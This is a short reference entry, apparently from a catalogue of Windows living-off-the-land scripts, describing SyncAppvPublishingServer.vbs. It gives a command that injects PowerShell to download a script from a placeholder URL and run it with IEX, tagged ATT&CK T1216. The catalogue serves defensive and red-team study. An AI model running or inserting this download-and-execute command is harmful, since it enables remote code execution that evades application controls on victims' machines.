.. /Syncappvpublishingserver.vbs
Star

Execute

Script used related to app-v and publishing server


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. Inject PowerShell script code with the provided arguments

    SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
    Use case
    Use Powershell host invoked from vbs script
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1216